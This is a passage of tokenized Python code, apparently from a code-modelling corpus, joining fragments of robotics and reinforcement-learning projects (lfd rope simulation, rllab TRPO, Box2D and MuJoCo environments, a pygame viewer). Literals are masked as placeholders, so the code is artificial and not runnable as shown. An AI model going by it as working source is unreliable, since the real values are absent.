<NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:15> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:12> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:8> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:5> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:2> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:255> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:200> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:100> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:255> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:15> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:11> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:7> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] ] , dtype = np . uint8 ) </s>
<s> try : <EOL> import pycuda . autoinit <EOL> import scikits . cuda . linalg <EOL> scikits . cuda . linalg . init ( ) <EOL> _has_cuda = True <EOL> _has_cula = scikits . cuda . linalg . _has_cula <EOL> except ( ImportError , OSError ) : <EOL> _has_cuda = False <EOL> _has_cula = False </s>
<s> from __future__ import division <EOL> import time <EOL> import os . path <EOL> import h5py <EOL> import atexit <EOL> import random <EOL> import sys <EOL> import trajoptpy <EOL> import numpy as np <EOL> from lfd . environment import sim_util <EOL> from lfd . environment . simulation import DynamicSimulation <EOL> from lfd . environment . simulation_object import BoxSimulationObject , RopeSimulationObject <EOL> from lfd . rapprentice import util <EOL> from lfd . rapprentice import task_execution , rope_initialization <EOL> from lfd . rapprentice . util import redprint <EOL> class GlobalVars : <EOL> exec_log = None <EOL> actions = None <EOL> actions_cache = None <EOL> def replace_rope ( sim , new_rope , animation ) : <EOL> rope_sim_obj = None <EOL> for sim_obj in sim . sim_objs : <EOL> if isinstance ( sim_obj , RopeSimulationObject ) : <EOL> rope_sim_obj = sim_obj <EOL> break <EOL> if rope_sim_obj : <EOL> sim . remove_objects ( [ rope_sim_obj ] ) <EOL> rope = RopeSimulationObject ( "<STR_LIT>" , new_rope , sim_util . RopeParams ( ) ) <EOL> sim . add_objects ( [ rope ] ) <EOL> sim . settle ( step_viewer = animation ) <EOL> def load_random_start_segment ( demofile ) : <EOL> start_keys = [ seg for seg in GlobalVars . actions . keys ( ) if '<STR_LIT>' in seg ] <EOL> seg_name = random . choice ( start_keys ) <EOL> return ( GlobalVars . actions [ seg_name ] [ '<STR_LIT>' ] , seg_name ) <EOL> def sample_rope_state ( demofile , sim , animation , human_check = False , <EOL> perturb_points = <NUM_LIT:7> , min_rad = <NUM_LIT:0.1> , max_rad = <NUM_LIT:0.1> ) : <EOL> success = False <EOL> while not success : <EOL> new_xyz , demo_id = load_random_start_segment ( demofile ) <EOL> perturb_radius = random . uniform ( min_rad , max_rad ) <EOL> rope_nodes = rope_initialization . find_path_through_point_cloud ( new_xyz , <EOL> perturb_peak_dist = perturb_radius , <EOL> num_perturb_points = perturb_points ) <EOL> replace_rope ( sim , rope_nodes , animation ) <EOL> sim . settle ( ) <EOL> if animation : <EOL> sim . viewer . Step ( ) <EOL> if human_check : <EOL> resp = raw_input ( "<STR_LIT>" ) <EOL> success = resp not in ( '<STR_LIT:N>' , '<STR_LIT:n>' ) <EOL> else : <EOL> success = True <EOL> return ( rope_nodes , demo_id ) <EOL> def gen_task_file ( args , sim , rotation_angle = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> taskfile = h5py . File ( args . gen_tasks . taskfile , '<STR_LIT:w>' ) <EOL> actionfile = h5py . File ( args . gen_tasks . actionfile , '<STR_LIT:r>' ) <EOL> try : <EOL> for i in range ( args . gen_tasks . n_examples ) : <EOL> redprint ( '<STR_LIT>' . format ( i , args . gen_tasks . n_examples ) ) <EOL> ( rope_nodes , demo_id ) = sample_rope_state ( actionfile , sim , <EOL> args . animation , <EOL> human_check = args . interactive , <EOL> perturb_points = args . gen_tasks . n_perturb_pts , <EOL> min_rad = args . gen_tasks . min_rad , <EOL> max_rad = args . gen_tasks . max_rad ) <EOL> taskfile . create_group ( str ( i ) ) <EOL> taskfile [ str ( i ) ] [ '<STR_LIT>' ] = rope_nodes <EOL> taskfile [ str ( i ) ] [ '<STR_LIT>' ] = str ( demo_id ) <EOL> taskfile . create_group ( '<STR_LIT:args>' ) <EOL> taskfile [ '<STR_LIT:args>' ] [ '<STR_LIT>' ] = args . gen_tasks . n_examples <EOL> taskfile [ '<STR_LIT:args>' ] [ '<STR_LIT>' ] = args . gen_tasks . actionfile <EOL> taskfile [ '<STR_LIT:args>' ] [ '<STR_LIT>' ] = ( args . gen_tasks . min_rad , <EOL> args . gen_tasks . max_rad ) <EOL> taskfile [ '<STR_LIT:args>' ] [ '<STR_LIT>' ] = args . gen_tasks . n_perturb_pts <EOL> taskfile [ '<STR_LIT:args>' ] [ '<STR_LIT>' ] = float ( rotation_angle ) <EOL> print '<STR_LIT>' <EOL> except : <EOL> print '<STR_LIT>' , sys . exc_info ( ) <EOL> raise <EOL> finally : <EOL> taskfile . close ( ) <EOL> actionfile . close ( ) <EOL> assert check_task_file ( args . gen_tasks . taskfile , args . gen_tasks . n_examples ) <EOL> def check_task_file ( fname , n_examples ) : <EOL> """<STR_LIT>""" <EOL> f = h5py . File ( fname , '<STR_LIT:r>' ) <EOL> success = True <EOL> for i in range ( n_examples ) : <EOL> if str ( i ) not in f : <EOL> print '<STR_LIT>' . format ( fname , i ) <EOL> success = False <EOL> f . close ( ) <EOL> return success <EOL> def parse_input_args ( ) : <EOL> parser = util . ArgumentParser ( ) <EOL> parser . add_argument ( "<STR_LIT>" , type = int , default = <NUM_LIT:0> , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , type = str , <EOL> default = '<STR_LIT>' ) <EOL> parser . add_argument ( "<STR_LIT>" , type = str , <EOL> default = '<STR_LIT>' ) <EOL> parser . add_argument ( "<STR_LIT>" , type = int , default = None ) <EOL> parser . add_argument ( "<STR_LIT>" , type = str , default = "<STR_LIT>" ) <EOL> subparsers = parser . add_subparsers ( dest = '<STR_LIT>' ) <EOL> parser_eval = subparsers . add_parser ( '<STR_LIT>' ) <EOL> parser_eval . add_argument ( '<STR_LIT>' , type = str , nargs = '<STR_LIT:?>' , <EOL> default = '<STR_LIT>' ) <EOL> parser_eval . add_argument ( '<STR_LIT>' , type = str , nargs = '<STR_LIT:?>' ) <EOL> parser_eval . add_argument ( "<STR_LIT>" , type = str , default = '<STR_LIT>' ) <EOL> parser_eval . add_argument ( "<STR_LIT>" , type = float , nargs = <NUM_LIT:6> , <EOL> metavar = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> default = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> help = "<STR_LIT>" ) <EOL> parser_eval . add_argument ( "<STR_LIT>" , type = int , default = <NUM_LIT:100> ) <EOL> parser_eval . add_argument ( "<STR_LIT>" , type = float , default = "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> parser_eval . add_argument ( "<STR_LIT>" , type = float , default = "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> parser_eval . add_argument ( "<STR_LIT>" , type = int , default = <NUM_LIT:5> , <EOL> help = "<STR_LIT>" ) <EOL> args = parser . parse_args ( ) <EOL> if not args . animation : <EOL> args . plotting = <NUM_LIT:0> <EOL> return args <EOL> def setup_log_file ( args ) : <EOL> if args . log : <EOL> redprint ( "<STR_LIT>" % args . log ) <EOL> GlobalVars . exec_log = task_execution . ExecutionLog ( args . log ) <EOL> atexit . register ( GlobalVars . exec_log . close ) <EOL> GlobalVars . exec_log ( <NUM_LIT:0> , "<STR_LIT>" , args ) <EOL> def set_global_vars ( args ) : <EOL> if args . random_seed is not None : np . random . seed ( args . random_seed ) <EOL> GlobalVars . actions = h5py . File ( args . gen_tasks . actionfile , '<STR_LIT:r>' ) <EOL> actions_root , actions_ext = os . path . splitext ( args . gen_tasks . actionfile ) <EOL> GlobalVars . actions_cache = h5py . File ( actions_root + '<STR_LIT>' + actions_ext , '<STR_LIT:a>' ) <EOL> def setup_lfd_environment_sim ( args ) : <EOL> actions = h5py . File ( args . gen_tasks . actionfile , '<STR_LIT:r>' ) <EOL> init_rope_xyz , init_joint_names , init_joint_values = sim_util . load_fake_data_segment ( actions , args . gen_tasks . fake_data_segment , args . gen_tasks . fake_data_transform ) <EOL> table_height = init_rope_xyz [ : , <NUM_LIT:2> ] . mean ( ) - <NUM_LIT> <EOL> sim_objs = [ ] <EOL> sim_objs . append ( BoxSimulationObject ( "<STR_LIT>" , <EOL> [ <NUM_LIT:1> , <NUM_LIT:0> , table_height + ( - <NUM_LIT> + <NUM_LIT> ) ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , dynamic = False ) ) <EOL> sim = DynamicSimulation ( ) <EOL> world = sim <EOL> sim . add_objects ( sim_objs ) <EOL> if args . animation : <EOL> viewer = trajoptpy . GetViewer ( sim . env ) <EOL> if os . path . isfile ( args . window_prop_file ) and os . path . isfile ( args . camera_matrix_file ) : <EOL> print "<STR_LIT>" <EOL> window_prop = np . loadtxt ( args . window_prop_file ) <EOL> camera_matrix = np . loadtxt ( args . camera_matrix_file ) <EOL> try : <EOL> viewer . SetWindowProp ( * window_prop ) <EOL> viewer . SetCameraManipulatorMatrix ( camera_matrix ) <EOL> except : <EOL> print "<STR_LIT>" <EOL> else : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> viewer . Idle ( ) <EOL> print "<STR_LIT>" <EOL> try : <EOL> window_prop = viewer . GetWindowProp ( ) <EOL> camera_matrix = viewer . GetCameraManipulatorMatrix ( ) <EOL> np . savetxt ( args . window_prop_file , window_prop , fmt = '<STR_LIT>' ) <EOL> np . savetxt ( args . camera_matrix_file , camera_matrix ) <EOL> except : <EOL> print "<STR_LIT>" <EOL> viewer . Step ( ) <EOL> return sim <EOL> def main ( ) : <EOL> args = parse_input_args ( ) <EOL> setup_log_file ( args ) <EOL> set_global_vars ( args ) <EOL> sim = setup_lfd_environment_sim ( args ) <EOL> if args . subparser_name == "<STR_LIT>" : <EOL> start = time . time ( ) <EOL> gen_task_file ( args , sim ) <EOL> print "<STR_LIT>" . format ( time . time ( ) - start ) <EOL> else : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> from rllab . algos . npo import NPO <EOL> from rllab . optimizers . conjugate_gradient_optimizer import ConjugateGradientOptimizer <EOL> from rllab . core . serializable import Serializable <EOL> class TRPO ( NPO , Serializable ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( <EOL> self , <EOL> optimizer = None , <EOL> optimizer_args = None , <EOL> ** kwargs ) : <EOL> Serializable . quick_init ( self , locals ( ) ) <EOL> if optimizer is None : <EOL> if optimizer_args is None : <EOL> optimizer_args = dict ( ) <EOL> optimizer = ConjugateGradientOptimizer ( ** optimizer_args ) <EOL> super ( TRPO , self ) . __init__ ( optimizer = optimizer , ** kwargs ) </s>
<s> import numpy as np <EOL> from rllab . envs . box2d . parser import find_body <EOL> from rllab . core . serializable import Serializable <EOL> from rllab . envs . box2d . box2d_env import Box2DEnv <EOL> from rllab . misc import autoargs <EOL> from rllab . misc . overrides import overrides <EOL> class DoublePendulumEnv ( Box2DEnv , Serializable ) : <EOL> @ autoargs . inherit ( Box2DEnv . __init__ ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> kwargs [ "<STR_LIT>" ] = kwargs . get ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> if kwargs . get ( "<STR_LIT>" , { } ) . get ( "<STR_LIT>" , False ) : <EOL> self . link_len = ( np . random . rand ( ) - <NUM_LIT:0.5> ) + <NUM_LIT:1> <EOL> else : <EOL> self . link_len = <NUM_LIT:1> <EOL> kwargs [ "<STR_LIT>" ] = kwargs . get ( "<STR_LIT>" , { } ) <EOL> kwargs [ "<STR_LIT>" ] [ "<STR_LIT>" ] = self . link_len <EOL> super ( DoublePendulumEnv , self ) . __init__ ( <EOL> self . model_path ( "<STR_LIT>" ) , <EOL> * args , ** kwargs <EOL> ) <EOL> self . link1 = find_body ( self . world , "<STR_LIT>" ) <EOL> self . link2 = find_body ( self . world , "<STR_LIT>" ) <EOL> Serializable . __init__ ( self , * args , ** kwargs ) <EOL> @ overrides <EOL> def reset ( self ) : <EOL> self . _set_state ( self . initial_state ) <EOL> self . _invalidate_state_caches ( ) <EOL> stds = np . array ( [ <NUM_LIT:0.1> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> pos1 , pos2 , v1 , v2 = np . random . randn ( * stds . shape ) * stds <EOL> self . link1 . angle = pos1 <EOL> self . link2 . angle = pos2 <EOL> self . link1 . angularVelocity = v1 <EOL> self . link2 . angularVelocity = v2 <EOL> return self . get_current_obs ( ) <EOL> def get_tip_pos ( self ) : <EOL> cur_center_pos = self . link2 . position <EOL> cur_angle = self . link2 . angle <EOL> cur_pos = ( <EOL> cur_center_pos [ <NUM_LIT:0> ] - self . link_len * np . sin ( cur_angle ) , <EOL> cur_center_pos [ <NUM_LIT:1> ] - self . link_len * np . cos ( cur_angle ) <EOL> ) <EOL> return cur_pos <EOL> @ overrides <EOL> def compute_reward ( self , action ) : <EOL> yield <EOL> tgt_pos = np . asarray ( [ <NUM_LIT:0> , self . link_len * <NUM_LIT:2> ] ) <EOL> cur_pos = self . get_tip_pos ( ) <EOL> dist = np . linalg . norm ( cur_pos - tgt_pos ) <EOL> yield - dist <EOL> def is_current_done ( self ) : <EOL> return False </s>
<s> from rllab . envs . mujoco . maze . maze_env import MazeEnv <EOL> from rllab . envs . mujoco . swimmer_env import SwimmerEnv <EOL> class SwimmerMazeEnv ( MazeEnv ) : <EOL> MODEL_CLASS = SwimmerEnv <EOL> ORI_IND = <NUM_LIT:2> <EOL> MAZE_HEIGHT = <NUM_LIT:0.5> <EOL> MAZE_SIZE_SCALING = <NUM_LIT:4> <EOL> MAZE_MAKE_CONTACTS = True </s>
<s> import pygame <EOL> import pygame . gfxdraw <EOL> import numpy as np <EOL> class Colors ( object ) : <EOL> black = ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> white = ( <NUM_LIT:255> , <NUM_LIT:255> , <NUM_LIT:255> ) <EOL> blue = ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:255> ) <EOL> red = ( <NUM_LIT:255> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> green = ( <NUM_LIT:0> , <NUM_LIT:255> , <NUM_LIT:0> ) <EOL> class Viewer2D ( object ) : <EOL> def __init__ ( self , size = ( <NUM_LIT> , <NUM_LIT> ) , xlim = None , ylim = None ) : <EOL> pygame . init ( ) <EOL> screen = pygame . display . set_mode ( size ) <EOL> if xlim is None : <EOL> xlim = ( <NUM_LIT:0> , size [ <NUM_LIT:0> ] ) <EOL> if ylim is None : <EOL> ylim = ( <NUM_LIT:0> , size [ <NUM_LIT:1> ] ) <EOL> self . _screen = screen <EOL> self . _xlim = xlim <EOL> self . _ylim = ylim <EOL> @ property <EOL> def xlim ( self ) : <EOL> return self . _xlim <EOL> @ xlim . setter <EOL> def xlim ( self , value ) : <EOL> self . _xlim = value <EOL> @ property <EOL> def ylim ( self ) : <EOL> return self . _ylim <EOL> @ ylim . setter <EOL> def ylim ( self , value ) : <EOL> self . _ylim = value <EOL> def reset ( self ) : <EOL> self . fill ( Colors . white ) <EOL> def fill ( self , color ) : <EOL> self . screen . fill ( color ) <EOL> def scale_x ( self , world_x ) : <EOL> xmin , xmax = self . xlim <EOL> return int ( ( world_x - xmin ) * self . screen . get_width ( ) / ( xmax - xmin ) ) <EOL> def scale_y ( self , world_y ) : <EOL> ymin , ymax = self . ylim <EOL> return int ( ( self . screen . get_height ( ) - ( world_y - ymin ) * self . screen . get_height ( ) / ( ymax - ymin ) ) ) <EOL> def scale_point ( self , point ) : <EOL> x , y = point <EOL> return ( self . scale_x ( x ) , self . scale_y ( y ) ) <EOL> @ property <EOL> def scale_factor ( self ) : <EOL> xmin , xmax = self . xlim <EOL> ymin , ymax = self . ylim <EOL> return min ( self . screen . get_width ( ) / ( xmax - xmin ) , self . screen . get_height ( ) / ( ymax - ymin ) ) <EOL> def scale_size ( self , size ) : <EOL> if hasattr ( size , '<STR_LIT>' ) : <EOL> x , y = size <EOL> return ( self . scale_x ( x + self . xlim [ <NUM_LIT:0> ] ) , self . screen . get_height ( ) - self . scale_y ( y + self . ylim [ <NUM_LIT:0> ] ) ) <EOL> return size * self . scale_factor <EOL> def line ( self , color , p1 , p2 , width = None ) : <EOL> if width is None : <EOL> width = <NUM_LIT:1> <EOL> else : <EOL> width = int ( width * self . scale_factor ) <EOL> x1 , y1 = self . scale_point ( p1 ) <EOL> x2 , y2 = self . scale_point ( p2 ) <EOL> pygame . draw . line ( self . screen , color , ( x1 , y1 ) , ( x2 , y2 ) , width ) <EOL> def circle ( self , color , p , radius ) : <EOL> pygame . draw . circle ( self . screen , color , self . scale_point ( p ) , int ( self . scale_size ( radius ) ) ) <EOL> def rect ( self , color , center , size ) : <EOL> cx , cy = self . scale_point ( center ) <EOL> w , h = self . scale_size ( size ) <EOL> if len ( color ) > <NUM_LIT:3> : <EOL> s = pygame . Surface ( ( w , h ) , pygame . SRCALPHA ) <EOL> s . fill ( color ) <EOL> self . screen . blit ( s , ( cx - w / <NUM_LIT:2> , cy - h / <NUM_LIT:2> ) ) <EOL> else : <EOL> pygame . draw . rect ( self . screen , color , pygame . Rect ( cx - w / <NUM_LIT:2> , cy - h / <NUM_LIT:2> , w , h ) ) <EOL> def polygon ( self , color , points ) : <EOL> if len ( color ) > <NUM_LIT:3> : <EOL> s = pygame . Surface ( ( self . screen . get_width ( ) , self . screen . get_height ( ) ) , pygame . SRCALPHA ) <EOL> s . fill ( ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> pygame . draw . polygon ( s , color , map ( self . scale_point , points ) ) <EOL> self . screen . blit ( s , ( <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> else : <EOL> pygame . draw . polygon ( self . screen , color , map ( self . scale_point , points ) ) <EOL> @ property <EOL> def screen ( self ) : <EOL> return self . _screen <EOL> def loop_once ( self ) : <EOL> pygame . display . flip ( ) <EOL> def checker ( self , colors = [ Colors . white , Colors . black ] , granularity = <NUM_LIT:4> , offset = ( <NUM_LIT:0> , <NUM_LIT:0> ) ) : <EOL> screen_height = self . screen . get_height ( ) <EOL> screen_width = self . screen . get_width ( ) <EOL> screen_size = min ( screen_height , screen_width ) <EOL> checker_size = int ( screen_size / granularity ) <EOL> offset_x = self . scale_x ( offset [ <NUM_LIT:0> ] + self . xlim [ <NUM_LIT:0> ] ) <EOL> offset_y = self . scale_y ( offset [ <NUM_LIT:1> ] + self . ylim [ <NUM_LIT:0> ] ) <EOL> start_idx = int ( offset_x / checker_size ) + int ( offset_y / checker_size ) <EOL> offset_x = ( ( offset_x % checker_size ) + checker_size ) % checker_size <EOL> offset_y = ( ( offset_y % checker_size ) + checker_size ) % checker_size <EOL> for row in range ( - <NUM_LIT:1> , int ( np . ceil ( screen_height * <NUM_LIT:1.0> / checker_size ) ) + <NUM_LIT:1> ) : <EOL> for col in range ( - <NUM_LIT:1> , int ( np . ceil ( screen_width * <NUM_LIT:1.0> / checker_size ) ) + <NUM_LIT:1> ) : <EOL> the_square = ( col * checker_size + offset_x , row * checker_size + offset_y , checker_size , checker_size ) <EOL> self . screen . fill ( colors [ ( start_idx + row + col ) % <NUM_LIT:2> ] , the_square ) <EOL> def pause ( self ) : <EOL> print "<STR_LIT>" <EOL> while True : <EOL> event = pygame . event . wait ( ) <EOL> if event . type == pygame . KEYDOWN : <EOL> break <EOL> print "<STR_LIT>" </s>
<s> from rllab . core . parameterized import Parameterized <EOL> class QFunction ( Parameterized ) : <EOL> pass </s>
<s> import os <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> from rllab . algos . vpg import VPG <EOL> from rllab . envs . box2d . cartpole_env import CartpoleEnv <EOL> from rllab . baselines . zero_baseline import ZeroBaseline <EOL> from rllab . baselines . linear_feature_baseline import LinearFeatureBaseline <EOL> from rllab . baselines . gaussian_mlp_baseline import GaussianMLPBaseline <EOL> from rllab . policies . gaussian_mlp_policy import GaussianMLPPolicy <EOL> from nose2 import tools <EOL> baselines = [ ZeroBaseline , LinearFeatureBaseline , GaussianMLPBaseline ] <EOL> @ tools . params ( * baselines ) <EOL> def test_baseline ( baseline_cls ) : <EOL> env = CartpoleEnv ( ) <EOL> policy = GaussianMLPPolicy ( env_spec = env . spec , hidden_sizes = ( <NUM_LIT:6> , ) ) <EOL> baseline = 